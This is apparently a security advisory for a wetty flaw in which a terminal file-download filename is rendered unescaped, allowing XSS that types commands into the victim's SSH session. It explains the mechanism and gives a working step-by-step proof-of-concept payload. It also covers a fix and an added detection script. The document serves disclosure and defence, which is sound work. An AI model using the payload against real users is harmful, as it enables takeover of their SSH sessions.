wetty, Cross-site Scripting (XSS) to Command Injection, CVE-2026-XXXXX (Critical) -DC-Jul2026-778


How the Mentioned CVE Works

This vulnerability resides in the wetty client’s handling of terminal escape sequences for file downloads. The wetty server forwards every byte it receives from the SSH pseudo-terminal (PTY) to the client-side `FileDownloader.buffer` method.
This buffer is designed to scan for specific, documented file-download control sequences: `\x1b[5i` to begin and `\x1b[4i` to end. When a complete sequence is detected, the inner payload is passed to the `onCompleteFile` function.
The payload is expected to be in the format `base64_filename:base64_content`. The function decodes the filename part using `window.atob()`. The critical flaw is that this decoded filename, which is entirely attacker-controlled, is then directly interpolated into an HTML string used to create a Toastify notification.
The wetty client configures Toastify with the `escapeMarkup: false` option, meaning it does not escape any HTML tags within the string. Consequently, an attacker can inject arbitrary HTML and JavaScript into the `fileName` variable.
This injected script executes in the context of the wetty origin. The wetty client exposes the live terminal session globally as `window.wetty_term`. Through this object, an attacker’s script can call `window.wetty_term.input(data, true)`, which triggers xterm.js’s `onData` event. This event is forwarded by the client as a socket `input` event to the server, which then writes the data directly to the PTY.
In essence, an attacker who can cause any text to be rendered in a victim’s wetty terminal can achieve arbitrary command injection, executing commands as the victim user on the connected SSH host.

DailyCVE Form:

Platform: ……. wetty
Version: …….. Versions prior to patch (e.g., <= 2.7.0)
Vulnerability: …… Cross-site Scripting (XSS) to Command Injection
Severity: ……. Critical (CVSS: 9.8)
Date: ………. 2026-07-01

Prediction: …… 2026-08-01

What Undercode Say:

Analytics:

  • Attack Vector: Remote
  • Attack Complexity: Low
  • Privileges Required: None (victim interaction required)
  • User Interaction: Required (victim must render attacker-controlled terminal output)
  • Scope: Changed (compromise of wetty client leads to compromise of SSH session)

Exploit:

1. On the SSH host, craft the malicious payload.
The filename contains the XSS payload that will call wetty_term.input()
PAYLOAD='"><img src=x onerror="window.wetty_term.input(\"id > /tmp/pwned\n\",true)">'
FNAME_B64=$(printf '%s' "$PAYLOAD" | base64 -w0)
DATA_B64=$(printf 'bait' | base64 -w0)
2. Write the escape sequence to a file that the victim will view.
printf '\x1b[5i%s:%s\x1b[4i' "$FNAME_B64" "$DATA_B64" > /tmp/notes.txt
3. When the victim reads the file (e.g., via 'cat /tmp/notes.txt'), the XSS triggers.
The injected JavaScript runs, sending "id > /tmp/pwned\n" as keystrokes to the victim's SSH session.

Expected Result:

The command `id > /tmp/pwned` is executed on the victim’s SSH host. Checking the file `/tmp/pwned` will reveal the output of the `id` command, confirming command injection.

Protection:

  • Immediate: HTML-escape the decoded filename before interpolation. In src/client/wetty/download.ts, lines 67-77, replace the direct use of `fileName` with an escaped version.
  • Example Fix:
    // ...
    // Escape the five HTML metacharacters before the name reaches the toast markup.
    const safeName = fileName.replace(/[&<>"']/g, (c) =>
      ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' })[c] ?? c,
    );
    // ...
    Toastify({
      text: `Download ready: <a href="${blobUrl}" target="_blank" download="${safeName}">${safeName}</a>`,
      // ...
    }).showToast();
    
  • Long-term: Avoid using `escapeMarkup: false` with user-controlled data. Consider using a more secure method for creating DOM elements.
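The client-side handling described under "How the Mentioned CVE Works" and the escaping fix proposed under "Protection", as an added example that is not wetty's code: it extracts complete `\x1b[5i` … `\x1b[4i` download sequences from a chunk of terminal output, decodes the `base64_filename:base64_content` payload, and shows the verbatim interpolation beside an HTML-escaped version, plus a defender-side check that flags a decoded filename carrying HTML metacharacters so the toast can be refused or logged. The function names (`extractDownloads`, `toastMarkupSafe`, `fileNameLooksHostile`, `auditTerminalOutput`) and the sample terminal output are constructed for illustration; only the control sequences, the payload format and the five-character escape come from the advisory.

```javascript
// Added example, not wetty's own code. Control sequences and payload format are
// those named in the advisory; all function names below are hypothetical.
const DOWNLOAD_START = '\x1b[5i';
const DOWNLOAD_END = '\x1b[4i';

// Base64 helpers that behave like the browser's atob/btoa but also run in Node.
function decodeBase64(s) {
  if (typeof atob === 'function') return atob(s);
  return Buffer.from(s, 'base64').toString('latin1');
}
function encodeBase64(s) {
  if (typeof btoa === 'function') return btoa(s);
  return Buffer.from(s, 'latin1').toString('base64');
}

// Pull every complete start..end sequence out of a chunk of PTY output and split
// its payload at the first ':' into a decoded filename and decoded content.
// An unterminated sequence is left alone (a real client would keep buffering).
function extractDownloads(chunk) {
  const results = [];
  let from = 0;
  for (;;) {
    const start = chunk.indexOf(DOWNLOAD_START, from);
    if (start === -1) break;
    const end = chunk.indexOf(DOWNLOAD_END, start + DOWNLOAD_START.length);
    if (end === -1) break;
    const payload = chunk.slice(start + DOWNLOAD_START.length, end);
    const sep = payload.indexOf(':');
    if (sep !== -1) {
      try {
        results.push({
          fileName: decodeBase64(payload.slice(0, sep)),
          content: decodeBase64(payload.slice(sep + 1)),
        });
      } catch {
        // malformed base64: drop the sequence rather than render anything from it
      }
    }
    from = end + DOWNLOAD_END.length;
  }
  return results;
}

// The five characters that matter in both text and attribute context.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Unsafe shape: the name is interpolated verbatim, so any markup inside it goes
// live once the toast library renders the string with escapeMarkup: false.
function toastMarkupUnsafe(fileName, blobUrl) {
  return `Download ready: <a href="${blobUrl}" target="_blank" download="${fileName}">${fileName}</a>`;
}

// Hardened shape: every occurrence of the name is escaped before interpolation.
function toastMarkupSafe(fileName, blobUrl) {
  const safeName = escapeHtml(fileName);
  return `Download ready: <a href="${blobUrl}" target="_blank" download="${safeName}">${safeName}</a>`;
}

// A legitimate download name has no reason to contain HTML metacharacters; use
// this to log the event or skip the notification entirely.
function fileNameLooksHostile(fileName) {
  return /[<>"'&]/.test(fileName);
}

// One pass over a chunk: what would be rendered, and whether it should be.
function auditTerminalOutput(chunk, blobUrl = 'blob:placeholder') {
  return extractDownloads(chunk).map(({ fileName }) => ({
    fileName,
    hostile: fileNameLooksHostile(fileName),
    toast: toastMarkupSafe(fileName, blobUrl),
  }));
}

// Constructed sample output (not from the advisory): one benign download and
// one whose filename carries markup.
const benign = `${DOWNLOAD_START}${encodeBase64('report.txt')}:${encodeBase64('hello')}${DOWNLOAD_END}`;
const hostile = `${DOWNLOAD_START}${encodeBase64('<b>evil</b>')}:${encodeBase64('bait')}${DOWNLOAD_END}`;
const sampleOutput = `$ cat notes.txt\r\n${benign}${hostile}\r\n$ `;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditTerminalOutput(sampleOutput));
}
```

Running the block prints the two parsed downloads; the second is marked hostile and its escaped toast markup contains no live tag, whereas `toastMarkupUnsafe` on the same name hands the `<b>` element straight to the renderer.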

Impact:

  • Confidentiality: An attacker can read the contents of the victim’s terminal buffer via `window.wetty_term.buffer.active`.
  • Integrity: An attacker can type arbitrary commands into the victim’s SSH session.
  • Authentication/Access Control: An attacker who can write content that a higher-privileged user renders can execute commands with that user’s privileges, leading to a complete compromise of the SSH session and the host system.

Sources:

Reported By: github.com
Extra Source Hub:
Undercode
